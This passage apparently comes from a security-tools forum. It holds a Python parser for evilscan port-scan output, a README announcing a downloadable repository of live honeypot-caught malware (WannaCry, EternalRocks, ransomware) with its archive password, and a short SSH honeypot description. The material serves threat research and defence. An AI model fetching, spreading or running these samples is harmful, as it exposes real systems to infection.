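The console format shown in the sample output (ip|port|banner|status, one result per line, with CR/LF inside a banner printed as the two-character escapes \r and \n) is easy to feed into an inventory or a diff against the previous scan of the same host. The following parser is an added example, not part of evilscan; the input is the sample output above plus two constructed lines with "timeout" and "refused" statuses, and the exact status words for non-open results are an assumption based on the --status help text.

```python
"""Parser for evilscan's console output: ip|port|banner|status per line.
Added example, not part of evilscan.  SAMPLE_OUTPUT is the page's sample
output plus two constructed lines (statuses "timeout" and "refused" are
assumed from the --status help text)."""
import json

SAMPLE_OUTPUT = r"""127.0.0.1|111||open
127.0.0.1|53||open
127.0.0.1|23|Debian GNU/Linux jessie/sid\r\ndebian login:|open
127.0.0.1|5432||open
127.0.0.1|27017||open
127.0.0.1|22||timeout
127.0.0.1|8080||refused
"""


def _unescape_banner(text):
    """evilscan prints CR/LF inside banners as the escapes \\r and \\n."""
    return text.replace("\\r", "\r").replace("\\n", "\n")


def parse_evilscan(text):
    """Turn console output into a list of dicts.  The status field never
    contains '|', so it is split off from the right; the banner, which may
    contain '|', is whatever is left between port and status."""
    records = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("root@"):   # blank line or echoed command
            continue
        head, _, status = line.rpartition("|")
        ip, _, rest = head.partition("|")
        port, _, banner = rest.partition("|")
        records.append({
            "ip": ip,
            "port": int(port),
            "banner": _unescape_banner(banner),
            "status": status,
        })
    return records


def open_ports(records, ip=None):
    """Sorted open ports, optionally restricted to one host."""
    return sorted(r["port"] for r in records
                  if r["status"] == "open" and (ip is None or r["ip"] == ip))


def with_banner(records):
    """Results where a banner was grabbed, i.e. the service spoke first;
    a telnet login prompt like the one on port 23 is the kind of finding
    an exposure review wants surfaced."""
    return [r for r in records if r["banner"]]


def to_json(records):
    return json.dumps(records, indent=2)


if __name__ == "__main__":
    parsed = parse_evilscan(SAMPLE_OUTPUT)
    print("open:", open_ports(parsed))
    print(to_json(with_banner(parsed)))
```

Because the parser anchors on the right-most '|' for the status and the two left-most for host and port, a banner that itself contains '|' survives intact; the unescaped banner keeps the real CR/LF so it can be matched against expected-banner rules later.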
  22. A collection of malware samples caught by several honeypots I manage.

ATTENTION: This repository contains actual malware; do not execute any of these files on your PC unless you know exactly what you are doing.

Content

Adylkuzz
Allaple
Bitcoin miners
Downloader-CUZ
EternalRocks
Generic Trojan
Muldrop
Pepex
Ransomware
Rbot
SdBot
Shodi
Virutn
Wannacry
Wisdomeyes
unknown

README.md

All of the malware samples contained in this repository have been collected by several honeypots installed at different locations all over the world. This is the result of a distributed honeypot project I am developing with the help of all of those who want to collaborate.

Malware with a generic name such as an MD5 value or smbxxx.tmp was not detected as malware by VirusTotal at the moment of upload, but this does not mean it's not malware.

Please feel free to download, analyze and reverse all the samples in this repository, but please let me know the results of your investigation.

All 7z and zip files are password protected and the password is "infected" (without quotes).

Thanks for your interest.

Fabrizio Monaco
twitter: @fabrimagic
keybase: fabrimagic

Download malware-samples.zip

Source: github.com
      • 3
      • Upvote
  23. //removed
  24. This is the honeypot agent for running on a server's ssh port. Collected data gets sent to http://sshpot.com/ (or wherever you want - the server/service is also open source).

Done
✓ Log commands used by attackers

TODO
x Tests

Download ssh-passwd-honeypot.zip

Source: github.com
      • 1
      • Upvote